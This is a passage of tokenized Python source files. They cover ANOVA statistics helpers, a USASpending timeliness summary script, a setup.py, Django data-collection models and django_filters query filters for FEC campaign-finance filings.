<EOL> ( subsource - <NUM_LIT:1> ) & Bwithins == ( source - <NUM_LIT:1> ) & Bwithins and <EOL> ( subsource - <NUM_LIT:1> ) < > ( source - <NUM_LIT:1> ) & Bwithins ) : <EOL> sub_effects = ( sub_effects + <EOL> alleffects [ alleffsources . index ( subsource ) ] ) <EOL> effect = sourceDMarray - sub_effects <EOL> alleffects . append ( effect ) <EOL> alleffsources . 
append ( source ) <EOL> SS = N . zeros ( ( levels , levels ) , '<STR_LIT:f>' ) <EOL> SS = asum ( ( effect ** <NUM_LIT:2> * sourceDNarray ) * <EOL> N . multiply . reduce ( N . take ( DM [ dindex ] . shape , btwnonsourcedims ) ) , <EOL> range ( len ( sourceDMarray . shape ) - <NUM_LIT:1> ) ) <EOL> SSlist . append ( SS ) <EOL> SSsources . append ( source ) <EOL> return SS <EOL> def multivar_SScalc ( workd ) : <EOL> if len ( workd . shape ) == <NUM_LIT:1> : <EOL> levels = <NUM_LIT:1> <EOL> else : <EOL> levels = workd . shape [ <NUM_LIT:0> ] <EOL> sserr = N . zeros ( ( levels , levels ) , '<STR_LIT:f>' ) <EOL> for i in range ( levels ) : <EOL> for j in range ( i , levels ) : <EOL> ssval = N . add . reduce ( workd [ i ] * workd [ j ] ) <EOL> sserr [ i , j ] = ssval <EOL> sserr [ j , i ] = ssval <EOL> return sserr <EOL> def subtr_cellmeans ( workd , subjslots ) : <EOL> """<STR_LIT>""" <EOL> sourcedims = makelist ( Bbetweens , Nfactors + <NUM_LIT:1> ) <EOL> transidx = range ( len ( subjslots . shape ) ) [ <NUM_LIT:1> : ] + [ <NUM_LIT:0> ] <EOL> tsubjslots = N . transpose ( subjslots , transidx ) <EOL> tworkd = N . transpose ( workd ) <EOL> errors = <NUM_LIT:1.0> * tworkd <EOL> if len ( sourcedims ) == <NUM_LIT:0> : <EOL> idx = [ - <NUM_LIT:1> ] <EOL> loopcap = [ <NUM_LIT:0> ] <EOL> if len ( sourcedims ) < > <NUM_LIT:0> : <EOL> btwsourcedims = map ( Bscols . index , sourcedims ) <EOL> idx = [ <NUM_LIT:0> ] * len ( btwsourcedims ) <EOL> idx [ <NUM_LIT:0> ] = - <NUM_LIT:1> <EOL> loopcap = N . take ( N . array ( Nlevels ) , sourcedims ) - <NUM_LIT:1> <EOL> while incr ( idx , loopcap ) < > - <NUM_LIT:1> : <EOL> mask = tsubjslots [ idx ] <EOL> thisgroup = tworkd * mask [ N . NewAxis , : ] <EOL> groupmns = amean ( N . compress ( mask , thisgroup ) , <NUM_LIT:1> ) <EOL> errors = errors - N . multiply . 
outer ( groupmns , mask ) <EOL> return errors <EOL> def F_value_wilks_lambda ( ER , EF , dfnum , dfden , a , b ) : <EOL> """<STR_LIT>""" <EOL> if type ( ER ) in [ IntType , FloatType ] : <EOL> ER = N . array ( [ [ ER ] ] ) <EOL> if type ( EF ) in [ IntType , FloatType ] : <EOL> EF = N . array ( [ [ EF ] ] ) <EOL> lmbda = LA . determinant ( EF ) / LA . determinant ( ER ) <EOL> if ( a - <NUM_LIT:1> ) ** <NUM_LIT:2> + ( b - <NUM_LIT:1> ) ** <NUM_LIT:2> == <NUM_LIT:5> : <EOL> q = <NUM_LIT:1> <EOL> else : <EOL> q = math . sqrt ( ( ( a - <NUM_LIT:1> ) ** <NUM_LIT:2> * ( b - <NUM_LIT:1> ) ** <NUM_LIT:2> - <NUM_LIT:2> ) / ( ( a - <NUM_LIT:1> ) ** <NUM_LIT:2> + ( b - <NUM_LIT:1> ) ** <NUM_LIT:2> - <NUM_LIT:5> ) ) <EOL> n_um = ( <NUM_LIT:1> - lmbda ** ( <NUM_LIT:1.0> / q ) ) * ( a - <NUM_LIT:1> ) * ( b - <NUM_LIT:1> ) <EOL> d_en = lmbda ** ( <NUM_LIT:1.0> / q ) / ( m * q - <NUM_LIT:0.5> * ( a - <NUM_LIT:1> ) * ( b - <NUM_LIT:1> ) + <NUM_LIT:1> ) <EOL> return n_um / d_en <EOL> def member ( factor , source ) : <EOL> return ( <NUM_LIT:1> << factor ) & source != <NUM_LIT:0> <EOL> def setsize ( source ) : <EOL> size = <NUM_LIT:0> <EOL> for bit in source : <EOL> if bit == <NUM_LIT:1> : <EOL> size = size + <NUM_LIT:1> <EOL> return size <EOL> def subset ( a , b ) : <EOL> return ( a & b ) == a <EOL> def propersubset ( a , b ) : <EOL> sub = ( ( a & b ) == a ) <EOL> if a == b : <EOL> sub = <NUM_LIT:0> <EOL> return sub <EOL> def numlevels ( source , Nlevels ) : <EOL> for i in range ( <NUM_LIT:30> ) : <EOL> if <NUM_LIT:1> << i >= source : <EOL> break <EOL> levelcount = <NUM_LIT:1> <EOL> for j in range ( i ) : <EOL> if subset ( <NUM_LIT:1> << j , source ) : <EOL> levelcount = levelcount * Nlevels [ j ] - <NUM_LIT:1> <EOL> return levelcount <EOL> def numbitson ( a ) : <EOL> numon = <NUM_LIT:0> <EOL> while a > <NUM_LIT:0> : <EOL> numon = numon + a % <NUM_LIT:2> <EOL> a = a >> <NUM_LIT:1> <EOL> return numon <EOL> def makebin ( sourcelist ) : <EOL> outbin = <NUM_LIT:0> <EOL> for item in 
sourcelist : <EOL> outbin = outbin + <NUM_LIT:2> ** item <EOL> return outbin <EOL> def makelist ( source , ncols ) : <EOL> levellist = [ ] <EOL> for j in range ( ncols ) : <EOL> if subset ( <NUM_LIT:1> << j , source ) : <EOL> levellist . append ( j ) <EOL> return levellist <EOL> def round4 ( num ) : <EOL> try : <EOL> return round ( num , <NUM_LIT:4> ) <EOL> except : <EOL> return '<STR_LIT>' </s>
<s> from django . db . models import Sum <EOL> from numpy import mean , std <EOL> from metrics . models import ProgramTimeliness , AgencyTimeliness , USASpendingAggregate <EOL> from utils import pretty_money <EOL> from settings import FISCAL_YEARS <EOL> print "<STR_LIT>" <EOL> for fy in FISCAL_YEARS : <EOL> timeliness_sum = ProgramTimeliness . objects . filter ( fiscal_year = fy ) . aggregate ( Sum ( '<STR_LIT>' ) ) [ '<STR_LIT>' ] <EOL> usaspending_sum = USASpendingAggregate . objects . get ( fiscal_year = fy ) . total_federal_funding <EOL> sample_pct = timeliness_sum * <NUM_LIT:100> / usaspending_sum <EOL> print "<STR_LIT>" % ( fy , round ( sample_pct , <NUM_LIT:2> ) , <EOL> pretty_money ( timeliness_sum ) , <EOL> pretty_money ( usaspending_sum ) ) <EOL> print "<STR_LIT>" <EOL> for fy in FISCAL_YEARS : <EOL> lag_values = [ pt . avg_lag_rows for pt in ProgramTimeliness . objects . filter ( fiscal_year = fy ) ] <EOL> print "<STR_LIT>" % ( fy , mean ( lag_values ) , std ( lag_values ) ) <EOL> print "<STR_LIT>" <EOL> for fy in FISCAL_YEARS : <EOL> lag_values = [ at . avg_lag_rows for at in AgencyTimeliness . objects . filter ( fiscal_year = fy ) ] <EOL> print "<STR_LIT>" % ( fy , mean ( lag_values ) , std ( lag_values ) ) </s>
<s> from mediasync import __version__ <EOL> from setuptools import setup , find_packages <EOL> import os <EOL> f = open ( os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) ) <EOL> readme = f . read ( ) <EOL> f . close ( ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = __version__ , <EOL> description = '<STR_LIT>' , <EOL> long_description = readme , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> packages = find_packages ( ) , <EOL> package_data = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> } , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> license = '<STR_LIT>' , <EOL> platforms = [ "<STR_LIT>" ] , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> from django . db import models <EOL> from django . contrib . auth . models import User <EOL> from postgres . fields import JSONField <EOL> from django . contrib . postgres . fields import ArrayField <EOL> from django . dispatch import receiver <EOL> from django . db . models . signals import pre_delete , post_save <EOL> class Session ( models . Model ) : <EOL> user = models . ForeignKey ( User ) <EOL> start = models . DateTimeField ( auto_now_add = True ) <EOL> @ classmethod <EOL> def current_for_user ( kls , user ) : <EOL> sessions = list ( kls . objects . filter ( user = user ) . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:1> ] ) <EOL> if sessions : <EOL> sess = sessions [ <NUM_LIT:0> ] <EOL> else : <EOL> sess = kls ( user = user ) <EOL> sess . save ( ) <EOL> return sess <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . user . username , self . start . date ( ) . isoformat ( ) ) <EOL> class Meta : <EOL> index_together = ( ( '<STR_LIT:user>' , '<STR_LIT:start>' ) ) <EOL> class Firm ( models . Model ) : <EOL> name = models . TextField ( ) <EOL> domain = models . TextField ( ) <EOL> count = models . PositiveIntegerField ( ) <EOL> external_id = models . TextField ( blank = True ) <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> FLAG_TYPE_CHOICES = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> class Flag ( models . Model ) : <EOL> firm = models . ForeignKey ( Firm ) <EOL> session = models . ForeignKey ( Session ) <EOL> type = models . CharField ( choices = FLAG_TYPE_CHOICES , max_length = <NUM_LIT:32> ) <EOL> resolved = models . BooleanField ( default = False ) <EOL> notes = models . TextField ( blank = True ) <EOL> created = models . DateTimeField ( auto_now_add = True ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( "<STR_LIT>" if not self . 
resolved else "<STR_LIT>" , self . type , self . firm . domain , self . created . isoformat ( ) ) <EOL> class BioPage ( models . Model ) : <EOL> firm = models . ForeignKey ( Firm ) <EOL> session = models . ForeignKey ( Session ) <EOL> url = models . URLField ( ) <EOL> data = JSONField ( ) <EOL> created = models . DateTimeField ( auto_now_add = True ) <EOL> def __str__ ( self ) : <EOL> url = self . url if len ( self . url ) < <NUM_LIT:30> else "<STR_LIT>" % ( self . url [ : <NUM_LIT:15> ] , self . url [ - <NUM_LIT:15> : ] ) <EOL> return "<STR_LIT>" % ( url , self . created . isoformat ( ) ) <EOL> class ViewLog ( models . Model ) : <EOL> firm = models . ForeignKey ( Firm ) <EOL> session = models . ForeignKey ( Session ) <EOL> bio_pages = ArrayField ( models . URLField ( ) , blank = True ) <EOL> non_bio_pages = ArrayField ( models . URLField ( ) , blank = True ) <EOL> created = models . DateTimeField ( auto_now_add = True ) <EOL> suspect = models . BooleanField ( default = False ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . firm . domain , self . created . isoformat ( ) ) <EOL> class CollectionSettings ( models . Model ) : <EOL> user = models . OneToOneField ( User ) <EOL> is_test_user = models . BooleanField ( default = False ) <EOL> is_assigned_user = models . BooleanField ( default = False ) <EOL> def __str__ ( self ) : <EOL> return str ( self . user ) <EOL> @ receiver ( post_save , sender = User ) <EOL> def ensure_settings ( sender , instance , created , ** kwargs ) : <EOL> CollectionSettings . objects . get_or_create ( user = instance ) <EOL> class Assignment ( models . Model ) : <EOL> user = models . ForeignKey ( User ) <EOL> firm = models . ForeignKey ( Firm ) <EOL> complete = models . BooleanField ( default = False ) </s>
<s> import django_filters <EOL> from datetime import date , timedelta <EOL> from fec_alerts . models import new_filing <EOL> from summary_data . models import Committee_Overlay , Authorized_Candidate_Committees , DistrictWeekly , District , Candidate_Overlay <EOL> from formdata . models import SkedE <EOL> from django . db . models import Q <EOL> from summary_data . utils . weekly_update_utils import get_week_number <EOL> class NFFilter ( django_filters . FilterSet ) : <EOL> min_raised = django_filters . NumberFilter ( name = '<STR_LIT>' , lookup_type = '<STR_LIT>' ) <EOL> min_spent = django_filters . NumberFilter ( name = '<STR_LIT>' , lookup_type = '<STR_LIT>' ) <EOL> min_coh = django_filters . NumberFilter ( name = '<STR_LIT>' , lookup_type = '<STR_LIT>' ) <EOL> filed_before = django_filters . DateFilter ( name = '<STR_LIT>' , lookup_type = '<STR_LIT>' ) <EOL> filed_after = django_filters . DateFilter ( name = '<STR_LIT>' , lookup_type = '<STR_LIT>' ) <EOL> class Meta : <EOL> model = new_filing <EOL> fields = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class COFilter ( django_filters . FilterSet ) : <EOL> min_raised = django_filters . NumberFilter ( name = '<STR_LIT>' , lookup_type = '<STR_LIT>' ) <EOL> min_spent = django_filters . NumberFilter ( name = '<STR_LIT>' , lookup_type = '<STR_LIT>' ) <EOL> min_coh = django_filters . NumberFilter ( name = '<STR_LIT>' , lookup_type = '<STR_LIT>' ) <EOL> class Meta : <EOL> model = Committee_Overlay <EOL> fields = [ '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class OSFilter ( django_filters . FilterSet ) : <EOL> min_ies = django_filters . 
NumberFilter ( name = '<STR_LIT>' , lookup_type = '<STR_LIT>' ) <EOL> class Meta : <EOL> model = Committee_Overlay <EOL> fields = [ '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class DistrictFilter ( django_filters . FilterSet ) : <EOL> class Meta : <EOL> model = District <EOL> fields = [ '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT:state>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class CandidateFilter ( django_filters . FilterSet ) : <EOL> class Meta : <EOL> model = Candidate_Overlay <EOL> fields = [ '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:state>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class DWFilter ( django_filters . FilterSet ) : <EOL> week_start = django_filters . NumberFilter ( name = '<STR_LIT>' , lookup_type = '<STR_LIT>' ) <EOL> week_end = django_filters . NumberFilter ( name = '<STR_LIT>' , lookup_type = '<STR_LIT>' ) <EOL> class Meta : <EOL> model = DistrictWeekly <EOL> fields = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class SkedEFilter ( django_filters . FilterSet ) : <EOL> min_spent = django_filters . 
NumberFilter ( name = '<STR_LIT>' , lookup_type = '<STR_LIT>' ) <EOL> class Meta : <EOL> model = SkedE <EOL> fields = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def yearFilter ( queryset , querydict ) : <EOL> try : <EOL> year = int ( querydict [ '<STR_LIT>' ] ) <EOL> queryset = queryset . filter ( Q ( coverage_from_date__gte = date ( year , <NUM_LIT:1> , <NUM_LIT:1> ) , coverage_to_date__lte = date ( year , <NUM_LIT:12> , <NUM_LIT> ) ) ) <EOL> except ( KeyError , ValueError ) : <EOL> pass <EOL> return queryset <EOL> def DWDistrictFilter ( queryset , querydict ) : <EOL> try : <EOL> district_list = querydict [ '<STR_LIT>' ] <EOL> if district_list . find ( '<STR_LIT:U+002C>' ) < <NUM_LIT:0> : <EOL> queryset = queryset . filter ( district__pk = district_list ) <EOL> else : <EOL> district_ids = district_list . split ( '<STR_LIT:U+002C>' ) <EOL> queryset = queryset . filter ( district__pk__in = district_ids ) <EOL> except KeyError : <EOL> pass <EOL> return queryset <EOL> def candidatedistrictFilter ( queryset , querydict ) : <EOL> try : <EOL> id = int ( querydict [ '<STR_LIT>' ] ) <EOL> queryset = queryset . filter ( district__pk = id ) <EOL> except ( KeyError , ValueError ) : <EOL> pass <EOL> return queryset <EOL> def districtIDFilter ( queryset , querydict ) : <EOL> try : <EOL> id = int ( querydict [ '<STR_LIT>' ] ) <EOL> queryset = queryset . filter ( pk = id ) <EOL> except ( KeyError , ValueError ) : <EOL> pass <EOL> return queryset <EOL> def weekFilter ( queryset , querydict ) : <EOL> try : <EOL> week = querydict [ '<STR_LIT>' ] <EOL> if week . upper ( ) == "<STR_LIT>" : <EOL> queryset = queryset . filter ( cycle_week_number = get_week_number ( date . today ( ) ) ) <EOL> if week . upper ( ) == "<STR_LIT>" : <EOL> queryset = queryset . filter ( cycle_week_number = get_week_number ( date . 
today ( ) ) - <NUM_LIT:1> ) <EOL> except KeyError : <EOL> pass <EOL> return queryset <EOL> def periodTypeFilter ( queryset , querydict ) : <EOL> try : <EOL> period_type = querydict [ '<STR_LIT>' ] <EOL> if period_type . startswith ( '<STR_LIT>' ) : <EOL> if period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:1> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:3> , coverage_to_date__day = <NUM_LIT> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:4> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:6> , coverage_to_date__day = <NUM_LIT:30> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:7> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:9> , coverage_to_date__day = <NUM_LIT:30> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:10> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:12> , coverage_to_date__day = <NUM_LIT> ) <EOL> elif period_type . startswith ( '<STR_LIT:M>' ) : <EOL> if period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:1> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:1> , coverage_to_date__day = <NUM_LIT> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( Q ( coverage_from_date__month = <NUM_LIT:2> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:2> , coverage_to_date__day = <NUM_LIT> ) | Q ( coverage_from_date__month = <NUM_LIT:2> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:2> , coverage_to_date__day = <NUM_LIT> ) ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . 
filter ( coverage_from_date__month = <NUM_LIT:3> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:3> , coverage_to_date__day = <NUM_LIT> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:4> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:4> , coverage_to_date__day = <NUM_LIT:30> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:5> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:5> , coverage_to_date__day = <NUM_LIT> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:6> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:6> , coverage_to_date__day = <NUM_LIT:30> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:7> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:7> , coverage_to_date__day = <NUM_LIT> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:8> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:8> , coverage_to_date__day = <NUM_LIT> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:9> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:9> , coverage_to_date__day = <NUM_LIT:30> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:10> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:10> , coverage_to_date__day = <NUM_LIT> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . 
filter ( coverage_from_date__month = <NUM_LIT:11> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:11> , coverage_to_date__day = <NUM_LIT:30> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:12> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:12> , coverage_to_date__day = <NUM_LIT> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( Q ( coverage_from_date = date ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:1> ) , coverage_to_date = date ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:15> ) ) ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( Q ( coverage_from_date = date ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:16> ) , coverage_to_date = date ( <NUM_LIT> , <NUM_LIT:11> , <NUM_LIT> ) ) ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_to_date = date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> elif period_type . startswith ( '<STR_LIT:S>' ) : <EOL> if period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:1> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:6> , coverage_to_date__day = <NUM_LIT:30> ) <EOL> elif period_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( coverage_from_date__month = <NUM_LIT:7> , coverage_from_date__day = <NUM_LIT:1> , coverage_to_date__month = <NUM_LIT:12> , coverage_to_date__day = <NUM_LIT> ) <EOL> except KeyError : <EOL> pass <EOL> return queryset <EOL> def reportTypeFilter ( queryset , querydict ) : <EOL> try : <EOL> report_type = querydict [ '<STR_LIT>' ] <EOL> if report_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( form_type__in = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> elif report_type == '<STR_LIT>' : <EOL> queryset = queryset . 
filter ( form_type__in = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> elif report_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( form_type__in = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> elif report_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( form_type__in = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> elif report_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( form_type__in = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> elif report_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( form_type__in = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> elif report_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( form_type__in = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> elif report_type == '<STR_LIT>' : <EOL> queryset = queryset . filter ( form_type__in = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> except KeyError : <EOL> pass <EOL> return queryset <EOL> def orderingFilter ( queryset , querydict , fields ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> ordering = querydict [ '<STR_LIT>' ] <EOL> if ordering . lstrip ( '<STR_LIT:->' ) in fields : <EOL> orderlist = [ ordering ] <EOL> queryset = queryset . order_by ( * orderlist ) <EOL> except KeyError : <EOL> pass <EOL> return queryset <EOL> def committeeSearchSlow ( queryset , querydict ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> search_term = querydict [ '<STR_LIT>' ] <EOL> queryset = queryset . filter ( committee_name__icontains = search_term ) <EOL> except KeyError : <EOL> pass <EOL> return queryset <EOL> def candidateidSearch ( queryset , querydict ) : <EOL> try : <EOL> candidate_id = querydict [ '<STR_LIT>' ] <EOL> authorized_committee_list = Authorized_Candidate_Committees . objects . filter ( candidate_id = candidate_id ) <EOL> committee_list = [ x . get ( '<STR_LIT>' ) for x in authorized_committee_list . values ( '<STR_LIT>' ) ] <EOL> queryset = queryset . 
filter ( fec_id__in = committee_list ) <EOL> except KeyError : <EOL> pass <EOL> return queryset <EOL> def filingTimeFilter ( queryset , querydict ) : <EOL> try : <EOL> time_range = querydict [ '<STR_LIT>' ] <EOL> if time_range == '<STR_LIT>' : <EOL> today = date . today ( ) <EOL> queryset = queryset . filter ( filed_date = today ) <EOL> elif time_range == '<STR_LIT>' : <EOL> today = date . today ( ) <EOL> one_week_ago = today - timedelta ( days = <NUM_LIT:7> ) <EOL> queryset = queryset . filter ( filed_date__gte = one_week_ago ) <EOL> elif time_range == '<STR_LIT>' : <EOL> queryset = queryset . filter ( filed_date__gte = date ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) , filed_date__lte = date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> elif time_range == '<STR_LIT>' : <EOL> queryset = queryset . filter ( filed_date__gte = date ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) , filed_date__lte = date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> except KeyError : <EOL> pass <EOL> return queryset <EOL> def multiCommitteeTypeFilter ( queryset , querydict ) : <EOL> try : <EOL> committee_class = querydict [ '<STR_LIT>' ] <EOL> committee_class = committee_class . upper ( ) <EOL> if committee_class == '<STR_LIT>' : <EOL> queryset = queryset . filter ( committee_designation = committee_class ) <EOL> elif committee_class == '<STR_LIT:L>' : <EOL> queryset = queryset . filter ( committee_designation = '<STR_LIT:D>' ) <EOL> else : <EOL> committee_type_list = list ( committee_class ) <EOL> queryset = queryset . filter ( committee_type__in = committee_type_list ) <EOL> except KeyError : <EOL> pass <EOL> return queryset <EOL> def multiCTypeFilter ( queryset , querydict ) : <EOL> try : <EOL> committee_class = querydict [ '<STR_LIT>' ] <EOL> committee_class = committee_class . upper ( ) <EOL> if committee_class == '<STR_LIT>' : <EOL> queryset = queryset . filter ( designation = committee_class ) <EOL> elif committee_class == '<STR_LIT:L>' : <EOL> queryset = queryset . 
filter ( designation = '<STR_LIT:D>' ) <EOL> else : <EOL> committee_type_list = list ( committee_class ) <EOL> queryset = queryset . filter ( ctype__in = committee_type_list ) <EOL> except KeyError : <EOL> pass <EOL> return queryset <EOL> def candidateCommitteeSearchSlow ( queryset , querydict ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> search_term = querydict [ '<STR_LIT>' ] <EOL> queryset = queryset . filter ( Q ( name__icontains = search_term ) | Q ( curated_candidate__name__icontains = search_term ) ) <EOL> except KeyError : <EOL> pass <EOL> return queryset </s>
